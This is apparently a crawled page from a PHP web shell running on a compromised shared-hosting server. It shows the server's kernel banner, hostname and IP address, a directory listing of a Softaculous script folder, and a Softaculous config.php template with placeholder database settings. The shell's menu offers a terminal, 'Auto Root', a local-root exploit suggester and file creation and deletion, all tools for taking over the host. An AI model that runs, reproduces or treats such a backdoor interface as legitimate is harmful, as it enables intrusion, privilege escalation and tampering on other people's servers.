Linux sea-business-23.hostwindsdns.com 4.18.0-553.121.1.lve.el8.x86_64 #1 SMP Thu Apr 30 16:40:41 UTC 2026 x86_64
LiteSpeed
Server IP : 104.168.155.189 & Your IP : 216.73.217.84
Domains :
Cant Read [ /etc/named.conf ]
User : zvmcccat
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
page /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2018-03-09 11:20
php53
[ DIR ]
drwxr-xr-x
2018-03-09 11:20
php56
[ DIR ]
drwxr-xr-x
2018-03-09 11:20
php71
[ DIR ]
drwxr-xr-x
2018-03-09 11:20
clone.php
5.52
KB
-rw-r--r--
2017-09-28 15:01
config.language.php
39
B
-rw-r--r--
2011-06-27 16:52
config.php
1.28
KB
-rw-r--r--
2011-06-27 16:52
edit.php
4.91
KB
-rw-r--r--
2017-09-28 15:01
edit.xml
433
B
-rw-r--r--
2015-04-11 13:18
fileindex.php
243
B
-rw-r--r--
2012-08-14 13:43
import.php
3.21
KB
-rw-r--r--
2017-09-28 15:01
info.xml
1.91
KB
-rw-r--r--
2017-09-28 14:58
install.js
921
B
-rw-r--r--
2013-01-04 14:22
install.php
5.41
KB
-rw-r--r--
2017-09-28 15:01
install.xml
847
B
-rw-r--r--
2012-12-14 11:01
md5
2.61
KB
-rw-r--r--
2017-09-28 15:01
notes.txt
28
B
-rw-r--r--
2011-06-27 16:52
rss.xml
749
B
-rw-r--r--
2012-08-14 13:43
upgrade.php
2.51
KB
-rw-r--r--
2017-09-28 15:01
upgrade.xml
303
B
-rw-r--r--
2011-07-29 05:36
Save
Rename
<?php /* 提示: 发生 Warning: Cannot modify header information - headers already sent by (output started at config.php:1) in global.php on line 12 此类错误是由于文件保存时添加的 UTF-8 BOM 造成的, 建议不要使用记事本修改此文件, 如果站点名称不是中文的可以直接保存为 GB2312 编码避免此问题. */ ############ 数据库配置 ############ ############ DATABASE SETTINGS ############ // 数据库主机 // Database host define(DATABASE_HOST, '[[softdbhost]]'); // 数据库用户名 // Database username define(DATABASE_USER, '[[softdbuser]]'); // 数据库密码 // Database password define(DATABASE_PSSWORD, '[[softdbpass]]'); // 数据库名称 // Database name define(DATABASE_DB_NAME, '[[softdb]]'); ############ 站点配置 ############ ############ WEBSITE SETTINGS ############ // 网站名称 // Website name define(SITE_NAME, '[[site_name]]'); // 微博访问路径, 请以 / 结尾 // Website visit URL, End up with / define(BASE_URL, '[[softurl]]/'); ############ 下面的内容无需修改 ############ ############ DON'T MODIFY ############ define(COOKERY_FRAMEWORK_DIR, './'); define(DEBUG, FALSE); define(COOKIE_PREFIX, substr(strtoupper(md5($_SERVER['HTTP_HOST'])), 0, 6) . '_');